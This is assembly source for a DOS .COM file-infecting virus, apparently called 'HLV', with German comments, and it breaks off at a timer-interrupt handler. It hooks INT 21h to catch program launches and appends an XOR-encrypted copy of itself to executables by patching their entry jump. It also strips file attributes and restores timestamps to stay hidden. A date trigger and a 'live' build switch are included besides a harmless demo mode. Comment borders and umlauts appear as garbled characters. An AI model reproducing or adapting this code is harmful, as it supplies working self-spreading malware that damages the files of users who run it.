+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +TEXT SEGMENT ; + ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einige das Verst刵dnis erleichternde Definitionen. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +NearJmp EQU 0E9 ; +PORT_B_8259A EQU 20 ; +EOI_8259A EQU 20 ; +PORT_B_8255 EQU 61 ; +FIRSTCONST EQU 0131 ; +FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; +FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; +DeCrptd EQU 0 ;-----; +EnCrptd EQU 1 ; +BIOSDATASEG EQU 040 ; +MonoBase EQU 0B000 ; +ColorBase EQU 0B800 ; +B_VIDPAGE EQU THIS WORD + 04E ; +B_TIMERVAR EQU THIS WORD + 06C ; +TimerInt EQU 1C ; +DOS EQU 21 ; +DOS_multi EQU 2F ; +MS_SetDTA EQU 1A ; + DTA_in_PSP EQU 80 ; +MS_SetInt EQU 25 ; +MS_GetDateTime EQU 2A ; +MS_GetVer EQU 30 ; + DOS_v_02 EQU 2 ; +MS_GetInt EQU 35 ; +MS_Open EQU 3Dh ; + Read_Only EQU 0 ; + Read_Write EQU 2 ; +MS_Close EQU 3E ; +MS_Read EQU 3F ; +MS_Write EQU 40 ; +MS_MoveFP EQU 42 ; + OfsFrmTop EQU 0 ; + OfsFrmEnd EQU 02 ; +MS_GetFileAttr EQU 4300 ; +MS_SetFileAttr EQU 4301 ; + Attr_A EQU 20 ; + Attr_SHR EQU 7 ; + Attr_ASHR EQU Attr_A OR Attr_SHR ; +MS_AllocMem EQU 48 ; +MS_ReleaseMem EQU 49 ; + MemCBsig EQU THIS BYTE + 0 ; + MemCBowned EQU THIS WORD + 1 ; + MemCBsize EQU THIS WORD + 3 ; +MS_Exec EQU 4Bh ; + MS_Exec_SF0 EQU 0 ; + Virus_fun EQU 0ffh ; + Virus_Sig EQU 55AA ; +MS_SetPSP EQU 50 ; + PSPsize EQU 00100 ; + PSPCurCom EQU THIS WORD + 016 ; + PSPEnv EQU THIS WORD + 02C ; + PSP_SegJFB EQU THIS WORD + 036 ; + NoEnv EQU 0 ; +MS_GetFileDate EQU 5700 ; +MS_SetFileDate EQU 5701 ; +PSP_100 EQU THIS WORD + PSPsize ; +PSP_102 EQU THIS BYTE + PSPsize + 2 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Ab hier wird Objektcode erzeugt, Datenbereich Nr. 1. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Crypt1 DB 0 ; +Crypt2 EQU OFFSET Crypt1 + FIRSTBASE ; +Crypt3 EQU Crypt1 + PSPsize ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Einsprungstelle, entschl乻seln des Virus falls notwendig. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_000: CLI ; + MOV BP,SP ; + CALL XI_001 ; +XI_001: POP BX ; + SUB BX,FIRSTCONST ; + TEST BYTE PTR CS:[BX+Crypt2],EnCrptd ; + JZ XI_003 ; + LEA SI,[BX + XR_000] ; + MOV SP,OFFSET EOFC-OFFSET XI_003 ; +XI_002: XOR [SI],SI ; + XOR [SI],SP ; + INC SI ; + DEC SP ; + JNZ XI_002 ; +XI_003 LABEL NEAR ; + XR_000 EQU OFFSET XI_003 + FIRSTBASE ; + XR_001 EQU XI_003 + PSPsize ; + MOV SP,BP ; + JMP SHORT XI_004 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Datenbereich 2. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; + XD_000 DW PSPsize ; +Disp_to_com_1 EQU OFFSET XD_000 + FIRSTBASE ; + XD_001 DW 9090 ; +Disp_to_com_2 EQU OFFSET XD_001 + FIRSTBASE ; + XD_002 DW 9090 ; +Initial_AX EQU OFFSET XD_002 + FIRSTBASE ; + XD_003 EQU THIS WORD ; + XD_004 EQU THIS BYTE + 2 ; + NOP ; + NOP ; + NOP ; +Org1stInstr_s1 EQU OFFSET XD_003 + FIRSTBASE ; +Org1stInstr_t1 EQU XD_003 + PSPsize ; +Org1stInstr_t2 EQU XD_003 + PSPsize + 1 ; +Org1stInstr_s2 EQU OFFSET XD_004 + FIRSTBASE ; + XD_005 DW 2 dup ( 9090 ) ; +Org_Int_1C EQU XD_005 + PSPsize ; + XD_006 DW 2 dup ( 9090 ) ; +Org_int_21s EQU OFFSET XD_006 + FIRSTBASE ; +Org_Int_21t EQU XD_006 + PSPsize ; + ; +IF SWITCHABLE ; + ; + XD_007 DW 2 dup ( 9090 ) ; +Org_Int_2F EQU XD_007 + PSPsize ; + XD_008 DB 5, "_HLV_ " ; +Cmd_2F EQU XD_008 + PSPsize ; + XD_009 DB 'HLV is on',0Dh,0Ah,'$' ; +Msg_On EQU XD_009 + PSPsize ; + XD_010 DB 'HLV is off',0Dh,0Ah,'$' ; +Msg_Off EQU XD_010 + PSPsize ; + ; +ENDIF ; + ; + XD_011 DW 9090 ; +File_Attributes EQU XD_011 + PSPsize ; + XD_012 DW 9090 ; +File_Date EQU XD_012 + PSPsize ; + XD_013 DW 9090 ; +File_Time EQU XD_013 + PSPsize ; + XD_014 DW 2 dup ( 9090 ) ; +Pathname EQU XD_014 + PSPsize ; + XD_015 DW 2 dup ( 9090 ) ; +File_Size_lsb EQU XD_015 + PSPsize ; +File_Size_msb EQU XD_015 + PSPsize + 2 ; + XD_016 DB NearJmp ; +FirstOpCode_1 EQU XD_016 + PSPsize ; + XD_017 DW 9090 ; +FirstOpCode_2 EQU XD_017 + PSPsize ; + XD_018 DB 90 ; +Num_of_Col EQU XD_018 
+ PSPsize ; + XD_019 DB 90 ; +Last_Line EQU XD_019 + PSPsize ; + XD_020 DB 90 ; +Prevent_Snow? EQU XD_020 + PSPsize ; +Last_Pair EQU THIS WORD + PSPsize ; + XD_021 DB 90 ; + XD_022 DB 90 ; +Last_Char EQU XD_021 + PSPsize ; +Last_Attr EQU XD_022 + PSPsize ; +RecTyp1 RECORD ExtCom:1, Recf_1:1, R_in_1c:1 ; + XD_023 RecTyp1 <0,0,0> ; +ISR_Flags EQU XD_023 + PSPsize ; + XD_024 DW 9090 ; +Seg_of_VRAM EQU XD_024 + PSPsize ; + XD_025 DW 9090 ; +Page_offset EQU XD_025 + PSPsize ; + XD_026 DW 9090 ; +Speed EQU XD_026 + PSPsize ; + XD_027 DW 9090 ; +XR_002 EQU XD_027 + PSPsize ; + XD_028 DW 9090 ; +XR_003 EQU XD_028 + PSPsize ; + XD_029 DW 9090 ; +Num_of_char EQU XD_029 + PSPsize ; + XD_030 DW 9090 ; +XR_004 EQU XD_030 + PSPsize ; + XD_031 DW 7 dup ( 9090 ) ; +FirstRandom EQU XD_031 + PSPsize ; +LastRandom EQU This Word + PSPsize ; + DW 9090 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Installieren u. relozieren falls notwendig. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_004: CALL XI_005 ; +XI_005 LABEL NEAR ; +XR_005 EQU XI_005 + PSPsize ; + POP BX ; + SUB BX,FIRSTBASE2 ; + MOV CS:[BX+Disp_to_com_2],CS ; + MOV CS:[BX+Initial_AX],AX ; + MOV AX,CS:[BX+Org1stInstr_s1] ; + MOV [PSP_100],AX ; + MOV AL,CS:[BX+Org1stInstr_s2] ; + MOV [PSP_102],AL ; + PUSH BX ; + MOV AH,MS_GetVer ; + MSDOS ; + POP BX ; + CMP AL,DOS_v_02 ; + JB XI_006 ; + MOV AX,MS_Exec * 100 + Virus_fun ; + XOR DI,DI ; + XOR SI,SI ; + MSDOS ; + CMP DI,Virus_sig ; + JNZ XI_007 ; +XI_006: STI ; + MOV_S ES,DS ; + MOV AX,CS:[BX+Initial_AX] ; + JMP DWORD PTR CS:[BX+Disp_to_com_1] ; +XI_007: PUSH BX ; + MOV AX,MS_GetInt * 100 + DOS ; + MSDOS ; + MOV AX,BX ; + POP BX ; + MOV CS:[BX+Org_int_21s],AX ; + MOV CS:[BX+Org_int_21s + 2],ES ;------------; + MOV AX, (OFFSET EOFC - OFFSET Crypt1) SHR 4 + 11 ; + MOV BP,CS ;------------; + DEC BP ; + MOV ES,BP ; + MOV SI,CS:[PSPCurCom] ; + MOV ES:[MemCBowned],SI ; + MOV DX,ES:[MemCBsize] ; + MOV ES:[MemCBsize],AX ; + MOV ES:[MemCBsig],'M' ; + SUB DX,AX ; + DEC DX 
; + INC BP ; + ADD BP,AX ; + INC BP ; + MOV ES,BP ; + PUSH BX ; + MOV AH,MS_SetPSP ; + MOV BX,BP ; + MSDOS ; + POP BX ; + XOR DI,DI ; + MOV_S SS,ES ; + PUSH DI ; + LEA DI,[BX+XR_010] ; + MOV SI,DI ; + MOV CX,OFFSET EOFC ; + STD ; + REPZ MOVSB ; + PUSH ES ; + LEA CX,[BX+XR_006] ; + PUSH CX ; + RETF ; +XI_008 LABEL NEAR ; +XR_006 EQU OFFSET XI_008 + FIRSTBASE ; + MOV CS:[BX+Disp_to_com_2],CS ; + LEA CX,[BX+Crypt2] ; + REPZ MOVSB ; + MOV CS:[PSP_SegJFB],CS ; + DEC BP ; + MOV ES,BP ; + MOV ES:[MemCBsize],DX ; + MOV ES:[MemCBsig],'Z' ; + MOV ES:[MemCBowned],CS ; + INC BP ; + MOV ES,BP ; + MOV_S ES,DS ; + MOV_S DS,CS ; + LEA SI,[BX+Crypt2] ; + MOV DI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + PUSH ES ; + LEA AX,[XR_007] ; + PUSH AX ; + RETF ; +XI_009 LABEL NEAR ; +XR_007 EQU XI_009 + PSPsize ; + MOV CS:[PSPEnv],NoEnv ; + MOV CS:[PSPCurCom],CS ; + PUSH DS ; + LEA DX,[XR_008] ; + MOV_S DS,CS ; + MOV AX,MS_SetInt * 100 + DOS ; + MSDOS ; + POP DS ; + MOV AH,MS_SetDTA ; + MOV DX,DTA_in_PSP ; + MSDOS ; + SAVE DS,ES,SI,DI,CX ; + MOV_S ES,CS ; + MOV CX,BIOSDATASEG ; + MOV DS,CX ; + MOV DI,OFFSET FirstRandom ; + MOV SI,OFFSET B_TIMERVAR ; + MOV CL,8 ; + CLD ; + REPZ MOVSW ; + REST CX,DI,SI,ES,DS ; + ; +IF SWITCHABLE ; + ; + PUSH DS ; + MOV AX,MS_GetInt * 100 + DOS_multi ; + MSDOS ; + MOV CS:[Org_Int_2F],BX ; + MOV CS:[Org_Int_2F + 2],ES ; + MOV AX,MS_SetInt * 100 + DOS_multi ; + MOV DX,offset Int_2F_ISR ; + MOV_S DS,CS ; + MSDOS ; + POP DS ; + ; +ENDIF ; + ; + OR CS:[ISR_Flags],MASK ExtCom ; + MOV AH,MS_GetDateTime ; + MSDOS ; + CMP CX,YEAR ; + JZ XI_010 ; + JMP SHORT XI_011 ; +XI_010: CMP DH,MONTH ; + JB XI_011 ; + AND CS:[ISR_Flags],NOT MASK ExtCom ; +XI_011: MOV AX,1518 ; + CALL Random ; + INC AX ; + MOV CS:[XR_002],AX ; + MOV CS:[XR_003],AX ; + MOV CS:[XR_004],1 ; + MOV AX,MS_GetInt * 100 + TimerInt ; + MSDOS ; + MOV CS:[Org_Int_1C],BX ; + MOV CS:[Org_Int_1C + 2],ES ; + PUSH DS ; + MOV AX,MS_SetInt * 100 + TimerInt ; + MOV DX,OFFSET XR_009 ; + MOV_S DS,CS ; + 
MSDOS ; + POP DS ; +XI_012: MOV BX,OFFSET XR_005 - (FIRSTBASE2) ; + JMP XI_006 ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Neue Interrupt 21(h) Behandlungsroutine ( ver刵dert Exec - Funktion ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_013 LABEL NEAR ; +XR_008 EQU XI_013 + PSPsize ; + CMP AH,MS_Exec ; + JZ XI_016 ; +XI_014: JMP DWORD PTR CS:[Org_Int_21t] ; +XI_015: MOV DI,Virus_Sig ; + LES AX,CS:DWORD PTR [Org_Int_21t] ; + MOV DX,CS ; + IRET ; +XI_016: CMP AL,Virus_fun ; + JZ XI_015 ; + CMP AL,MS_Exec_SF0 ; + JNZ XI_014 ; + SAVE F,AX,BX,CX,DX,SI,DI,BP,ES,DS ; + MOV CS:[Pathname],DX ; + MOV CS:[Pathname + 2],DS ; + MOV_S ES,CS ; + MOV AX,MS_Open * 100 + Read_Only ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_GetFileDate ; + MSDOS ; + MOV CS:[File_Date],DX ; + MOV CS:[File_Time],CX ; + MOV AH,MS_Read ; + MOV_S DS,CS ; + MOV DX,OFFSET Org1stInstr_t1 ; + MOV CX,3 ; + MSDOS ; + JB XI_018 ; + CMP AX,CX ; + JNZ XI_018 ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + MOV CS:[File_Size_lsb],AX ; + MOV CS:[File_Size_msb],DX ; + MOV AH,MS_Close ; + MSDOS ;---------------; + CMP CS:[Org1stInstr_t1], 'Z' * 100 + 'M' ; + JNZ XI_017 ; + JMP XI_025 ; +XI_017: CMP CS:[File_Size_msb],+0 ; + JA XI_018 ; + CMP CS:[File_Size_lsb],offset Crypt1-offset EOFC-20 ; + JBE XI_019 ; +XI_018: JMP XI_025 ; +XI_019: CMP BYTE PTR CS:[Org1stInstr_t1],NearJmp ; + JNZ XI_020 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,OFFSET Crypt1 - offset EOFC - 2 ; + CMP AX,CS:[Org1stInstr_t2] ;---------------; + JZ XI_018 ; + ; +IF DEMO ; +XI_020: CALL DEMO_Infect ; + JMP XI_025 ; + ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 Demo - Version, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 k e i n Virus. 
喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ;----------------; +ELSE ; +IFDEF _DANGER ; +XI_020 MOV AX,MS_GetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; + JB XI_018 ; + MOV CS:[File_Attributes],CX ; + XOR CL,Attr_A ; + TEST CL,Attr_ASHR ; + JZ XI_021 ; + MOV AX,MS_SetFileAttr ; + XOR CX,CX ; + MSDOS ; + JB XI_018 ; +XI_021: MOV AX,MS_Open * 100 + Read_Write ; + MSDOS ; + JB XI_018 ; + MOV BX,AX ; + MOV AX,MS_MoveFP * 100 + OfsFrmEnd ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + CALL Append_Virus ; + JNB XI_022 ; + MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + MOV CX,CS:[File_Size_msb] ; + MOV DX,CS:[File_Size_lsb] ; + MSDOS ; + MOV AH,MS_Write ; + XOR CX,CX ; + MSDOS ; + JMP SHORT XI_023 ; +XI_022: MOV AX,MS_MoveFP * 100 + OfsFrmTop ; + XOR CX,CX ; + XOR DX,DX ; + MSDOS ; + JB XI_023 ; + MOV AX,CS:[File_Size_lsb] ; + ADD AX,-2 ; + MOV CS:[FirstOpCode_2],AX ; + MOV AH,MS_Write ; + MOV DX,OFFSET FirstOpCode_1 ; + MOV CX,3 ; + MSDOS ; +XI_023: MOV AX,MS_SetFileDate ; + MOV DX,CS:[File_Date] ; + MOV CX,CS:[File_Time] ; + MSDOS ; + MOV AH,MS_Close ; + MSDOS ; + MOV CX,CS:[File_Attributes] ; + TEST CL,Attr_SHR ; + JNZ XI_024 ; + TEST CL,Attr_A ; + JNZ XI_025 ; +XI_024: MOV AX,MS_SetFileAttr ; + LDS DX,CS:DWORD PTR [Pathname] ; + MSDOS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍吧屯屯屯屯屯屯屯屯突鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 KEIN DEMO, 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 scharfer Virus. 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍 +ENDIF ; +ELSE ; + .ERR ; +ENDIF ; +ENDIF ; +IF SWITCHABLE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Neuer interner MSDOS Befehl '_HLV_' ! 喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ELSE ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍赏屯屯屯屯褪屯屯屯屯屯屯屯屯褪屯屯屯屯屯话鞍鞍鞍鞍鞍昂 +%Out 喊鞍鞍鞍鞍鞍 Kommando '_HLV_' nicht implementiert. 
喊鞍鞍鞍鞍鞍昂 +ENDIF ; +ENDIF ; +DISPNUM MACRO nu,nuxx ; +%Out 喊鞍鞍鞍鞍鞍 (Monat - Jahr) nu - nuxx 喊鞍鞍鞍鞍鞍昂 +ENDM ; +IF2 ; +%Out 喊鞍鞍鞍鞍鞍 Bis zum Jahresende aktiv ab: 喊鞍鞍鞍鞍鞍昂 +.radix 10 ; +DISPNUM %MONTH,%YEAR ; +.radix 16 ; +%Out 喊鞍鞍鞍鞍鞍韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯及鞍鞍鞍鞍鞍昂 +endif ; +XI_025: REST DS,ES,BP,DI,SI,DX,CX,BX,AX,F ;----------------; + JMP XI_014 ; +IF DEMO ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Statt APPEND in der DEMO - Version aufgerufene Prozedur. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +DEMO_INFECT PROC NEAR ; + push ax ; + push cx ; + in al,61 ; + or al,3 ; + out 61,al ; + mov al,0b6 ; + out 43,al ; + mov cx,0a ; +XI_026: dec cx ; + jz XI_030 ; +XI_027: mov ax,200d ; +XI_028: dec ax ; + cmp ax,100d ; + jz XI_031 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_029: nop ; + loop XI_029 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_028 ; +XI_030: in al,61 ; + and al,0fc ; + out 61,al ; + pop cx ; + pop ax ; + ret ; +XI_031: inc ax ; + cmp ax,600d ; + jz XI_026 ; + push ax ; + out 42,al ; + push cx ; + mov cx,150d ; +XI_032: nop ; + loop XI_032 ; + pop cx ; + mov al,ah ; + out 42,al ; + pop ax ; + jmp XI_031 ; +DEMO_INFECT ENDP ; + ; +ELSE ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Append Virus - von der Int21ISR aufgerufene Infektions-Prozdur +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Append_Virus PROC NEAR ; + SAVE ES,BX ; + MOV AH,MS_AllocMem ;----------; + MOV BX,(OFFSET EOFC - OFFSET Crypt1) SHR 4 + 1 ; + MSDOS ;----------; + POP BX ; + JNB XI_034 ; +XI_033: STC ; + POP ES ; + RET ; +XI_034: MOV CS:[Crypt3],EnCrptd ; + MOV ES,AX ; + MOV_S DS,CS ; + XOR DI,DI ; + MOV SI,PSPsize ; + MOV CX,OFFSET EOFC ; + CLD ; + REPZ MOVSB ; + MOV DI,OFFSET XI_003 ; + MOV SI,OFFSET XR_001 ; + ADD SI,[File_Size_lsb] ; + MOV CX,OFFSET EOFC - OFFSET XI_003 ; +XI_035: XOR ES:[DI],SI ; + XOR ES:[DI],CX ; + INC DI ; + INC SI ; + LOOP XI_035 ; + MOV DS,AX ; + MOV AH,MS_Write ; + XOR DX,DX ; + MOV CX,OFFSET EOFC ; + 
MSDOS ; + SAVE F,AX ; + MOV AH,MS_ReleaseMem ; + MSDOS ; + REST AX,F ; + MOV_S DS,CS ; + JB XI_033 ; + CMP AX,CX ; + JNZ XI_033 ; + POP ES ; + CLC ; + RET ; +Append_Virus ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 'Zufallszahlen' - Generator. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Random PROC NEAR ; + SAVE DS ; + MOV_S DS,CS ; + SAVE BX,CX,DX,AX ; + MOV CX,7 ; + MOV BX,offset LastRandom ; + PUSH [BX] ; +XI_036: MOV AX,[BX-02] ; + ADC [BX],AX ; + DEC BX ; + DEC BX ; + LOOP XI_036 ; + POP AX ; + ADC [BX],AX ; + MOV DX,[BX] ; + POP AX ; + OR AX,AX ; + JZ XI_037 ; + MUL DX ; +XI_037: MOV AX,DX ; + REST DX,CX,BX,DS ; + RET ; +Random ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut aus Videospeicher auslesen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Load_from_VRAM PROC NEAR ; + SAVE SI,DS,DX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV SI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV DS,[Seg_of_VRAM] ; + JZ XI_038 ; + Wait_HRI_or_VRI ; +XI_038: LODSW ; + STI ; + REST DX,DS,SI ; + RET ; +Load_from_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Zeichen und Attribut (AX) in den Videospeicher schreiben. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Write_to_VRAM PROC NEAR ; + SAVE DI,ES,DX,BX ; + MOV BX,AX ; + MOV AL,DH ; + MUL [Num_of_Col] ; + MOV DH,0 ; + ADD AX,DX ; + SHL AX,1 ; + ADD AX,[Page_offset] ; + MOV DI,AX ; + TEST [Prevent_Snow?],-1 ; + MOV ES,[Seg_of_VRAM] ; + JZ XI_039 ; + Wait_HRI_or_VRI ; +XI_039: MOV AX,BX ; + STOSB ; + STI ; + REST BX,DX,ES,DI ; + RET ; +Write_to_VRAM ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Bit 0 von Port B des 8255 Chips zur乧ksetzen (IO-Adresse : &H61 ). 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Toggle_Speaker PROC NEAR ; + PUSH AX ; + IN AL,PORT_B_8255 ; + XOR AL,02 ; + AND AL,0FE ; + OUT PORT_B_8255,AL ; + POP AX ; + RET ; +Toggle_Speaker ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein nicht darstellbares Zeichen enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Is_it_blank_? PROC NEAR ; + CMP AL,0 ; + JZ XI_040 ; + CMP AL,20 ; + JZ XI_040 ; + CMP AL,-1 ; + JZ XI_040 ; + CLC ; + RET ; +XI_040: STC ; + RET ; +Is_it_blank_? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + CF gesetzt, wenn AL ein Zeichen aus dem Linienzeichensatz enth刲t. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Spec_Graphik? PROC NEAR ; + CMP AL,0B0 ; + JB XI_041 ; + CMP AL,0DF ; + JA XI_041 ; + STC ; + RET ; +XI_041: CLC ; + RET ; +Spec_Graphik? ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Geschwindigkeit der Maschine ( zur Verwendung in DELAY ) ermitteln. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +GetSysSpeed PROC NEAR ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + STI ; + MOV AX,[B_TIMERVAR] ; +XI_042: CMP AX,[B_TIMERVAR] ; + JZ XI_042 ; + XOR CX,CX ; + MOV AX,[B_TIMERVAR] ; +XI_043: INC CX ; + JZ XI_045 ; + CMP AX,[B_TIMERVAR] ; + JZ XI_043 ; +XI_044: POP DS ; + MOV AX,CX ; + XOR DX,DX ; + MOV CX,0F ; + DIV CX ; + MOV CS:[Speed],AX ; + RET ; +XI_045: DEC CX ; + JMP XI_044 ; +GetSysSpeed ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Verz攇ern ( Verz攇erungszeit ist kaum maschinenabh刵gig ). +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Delay PROC NEAR ; + PUSH CX ; +XI_046: PUSH CX ; + MOV CX,[Speed] ; +XI_047: LOOP XI_047 ; + POP CX ; + LOOP XI_046 ; + POP CX ; + RET ; +Delay ENDP ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Eine neue Interrupt 1C(h) Behandlungsroutine. 
